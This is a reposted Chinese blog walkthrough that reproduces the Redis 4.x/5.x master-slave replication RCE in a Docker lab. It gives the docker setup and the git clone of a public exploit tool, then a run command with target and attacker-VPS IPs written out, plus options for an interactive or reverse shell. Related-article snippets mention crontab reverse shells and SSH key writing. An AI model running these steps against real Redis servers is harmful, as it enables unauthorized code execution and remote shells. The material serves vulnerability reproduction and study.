Redis基于主从复制的RCE 4.x/5.x 复现

最新推荐文章于 2023-12-08 19:40:45 发布
最新推荐文章于 2023-12-08 19:40:45 发布
阅读量415 收藏
点赞数
文章标签: 数据库 运维 shell
原文链接:http://www.cnblogs.com/paperpen/p/11178751.html
版权

0x00 前言

最近期末考试,博客好久没有更新了,这段时间爆了三四个洞,趁着还没去实习,抓紧复现一下,这次复现的是Redis的RCE,复现过程中也遇到很多问题,记录下来和大家分享一下

 

0x01 拉取镜像

docker确实是个好东西,有了它复现节省不少时间,首先拉取一个5.0镜像

docker search redis5.0    //查找镜像
docker pull damonevking/redis5.0   //拉取下图第三个镜像

 

0x02 运行环境

运行容器

docker run -p 6379:6379 -d damonevking/redis5.0 redis-server   //映射端口并运行容器

访问:你的ip:6379,如下图则搭建成功

 

0x03 漏洞利用

git clone https://github.com/Ridter/redis-rce.git   //下载漏洞利用脚本

注意,这里少一个.so的文件,到https://github.com/n0b0dyCN/redis-rogue-server下载并放到和redis-rce.py同一目录下

python3 redis-rce.py -r 136.244.70.243(目标ip) -L 136.244.70.243(自己的vps) -f exp.so   //ip就不打码了,师傅们不要搞我

在此处:i为交互式shell,r为反弹shell,根据自己的需要选择就可以了

 

参考链接:

https://github.com/Ridter/redis-rce

https://github.com/n0b0dyCN/redis-rogue-server

https://www.cnblogs.com/mrhonest/p/11162735.html

转载于:https://www.cnblogs.com/paperpen/p/11178751.html

weixin_30408165
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Redis进行RCE利用总结
weixin_50464560的博客
11-07 1883
百度百科:Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。连接到redis,输入以下指令利用crontab反弹shellRedis因配置不当可导致攻击者直接获取到服务器的权限。倘若服务器运行着LAMP/LNMP服务,且已知工作目录为。kali中打开一个新的命令行窗口执行。
Redis主从复制实现RCE
rev1ve的博客
12-01 2146
主从复制是指将一台Redis主服务器的数据,复制到其他的Redis从服务器。前者称为主节点(master),后者称为从节点(slave);主服务器可以进行读写操作,当发生写操作时自动将写操作同步给从服务器,而从服务器一般是只读,并接受主服务器同步过来写操作命令,然后执行这条命令。 也就是说,所有的数据修改只在主服务器上进行,然后将最新的数据同步给从服务器,这样就使得主从服务器的数据是一致的。建立主从复制,有3种方式:PS:建立主从关系只需要在从节点操作就行了,主节点不用任何操作我们先在同一个机器开两个red
红队攻防实战之Redis-RCE集锦
最新发布
12-08 634
心若有所向往,何惧道阻且长
Redis未授权访问利用合集
em.....
07-07 834
微信公众号:小惜渗透,欢迎大佬一起交流进步正常redis默认情况下,会绑定在0.0.0.0:6379,如果没有限制来源IP并且甚至没有密码,那么就会导致攻击者非法访问,并读取Redis的数据,还可以利用自身config命令进行写入操作,攻击者可将自己的ssh公钥写入目标服务器的/root/.ssh文件夹的authotrized_keys中,进而直接使用对应私钥登录目标服务器。搭建环境: 将这行绑定本地加上注释(还可以改成0.0.0.0)将保护模式关闭保存,然后启动redis服务 切记别忘了关防火墙在/roo
Redis沙盒逃逸漏洞 RCE(CVE-2022-0543)复现+getshell
xiaobai_20190815的博客
03-09 938
Redis沙盒逃逸漏洞 RCE(CVE-2022-0543)复现+getshell
Redis主从复制以及主从复制技术原理.docx
10-14
Redis 主从复制技术原理 概述 Redis 是一个开源的使用 ANSI C 语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value 数据库,并提供多种语言的 API。Redis 主从复制是指将一台 Redis 服务器的数据,复制到...
Redis哨兵主从模式+keepalived.docx
12-12
Redis主从复制模式是一种数据冗余容灾机制,通过在多台服务器上部署Redis实例,实现数据的实时同步和备份。当主服务器宕机时,备服务器可以自动切换为主服务器,提供高可用性的Redis服务。 在Redis主从复制模式中,...
Redis-x64-3.0.504安装包
10-11
Redis-x64-3.0.504安装包
LAMP架构+Redis主从复制.docx
10-08
LAMP架构+Redis主从复制 本文档主要介绍了LAMP架构的安装和配置,以及Redis主从复制的设置。LAMP架构是指Linux操作系统、Apache HTTP服务器、MySQL数据库和PHP编程语言的组合,而Redis则是一个开源的、基于内存的...
NoSQL之Redis主从复制集群部署.pdf
08-18
NoSQL之Redis主从复制集群部署.pdf
redis-rce:Redis RCE 的几种方法
04-15
redis-rce Redis RCE 的几种方法 文章请参考
redis主从复制
weixin_63231007的博客
02-28 1689
redis主从复制原理以及简单演示(环境真难搭)
Redis基于主从复制RCE
m0_58596609的博客
10-13 2440
Redis基于主从复制RCE
Redis漏洞复现——Redis 4.x/5.x 未授权访问漏洞
Aquarius_ego的博客
03-30 4460
Redis 4.x/5.x 未授权访问漏洞复现
从零开始了解Redis 主从复制全部流程
业精于勤,荒于嬉
06-16 567
在一个项目中读的操作是比写的操作要多的 像京东,淘宝等等同一时刻看的人是远远多于买的人的所有单个redis既要承担写的操作又要承担读的操作效率低在高并发的情况下不稳定所以引出了主从复制
Redis漏洞及搭配ssrf利用的姿势
qq_71467825的博客
06-24 1573
这篇博客就总结到这里,下次把经典一点的SSRF题目都总结到一起再学习一波,冲冲冲!!!
Redis未授权访问利用RCE进行漏洞复现
三天不打上房揭瓦的博客
12-22 1817
前言:小编也是现学现卖,方便自己记忆,写的不好的地方多多包涵,希望各位大佬多多批评指正。 目录漏洞概述影响版本环境搭建和漏洞复现1.环境启动2.下载使用RCE漏洞防御 漏洞概述 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 Redis在默认情况下,会绑定6379这个端口,如果服务器没有采用限制IP访问或在防火墙做策略,就会将Redis服务暴露在公网上,并且在没有设置密码认证的情况下(既然有密码也可进行爆破),会导
RedisRCE漏洞
midi
02-13 1723
前言 做ssrf时碰到个redis主从复制([网鼎杯 2020 玄武组]SSRFMe) writeup <?php if($_SERVER['REMOTE_ADDR']==="127.0.0.1"){ highlight_file(__FILE__); } if(isset($_POST['file'])){ file_put_contents($_POST['file'],"<?php echo 'redispass is root';exit();".$_POST['file'])
redis主从复制_通过 SSRF 操作 Redis 主从复制写 Webshell
weixin_39953102的博客
11-27 417
公众号拖了半年没写,文章写了一个月没发,懒得该死。废话说起来很巧,这篇文章早就写完了,当时写完的时候并没有发出去,因为本想着等曲老板的其他东西一起,结果第二天发现安恒他们发了一篇差不多的文章,看样子源码几乎是一致或者大部分相似的,当时真的觉得太巧了,安全圈是真的小,2333333 不过能见识到大家不同方面的思考和渗透思路,还是觉得是挺有意思的,于是将这篇文章部分内容发出来,一起学习交流...
给这段配置文件添加注释services: ruoyi-redis: container_name: ruoyi-redis image: redis build: context: ./redis ports: - "9063:6379" volumes: - ./redis/conf/redis.conf:/home/ruoyi/redis/redis.conf - ./redis/data:/data command: redis-server /home/ruoyi/redis/redis.conf
06-09
- ./redis/conf/redis.conf:/home/ruoyi/redis/redis.conf # Redis配置文件映射 - ./redis/data:/data # Redis数据目录映射 command: redis-server /home/ruoyi/redis/redis.conf # 启动Redis服务的命令 ``` ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值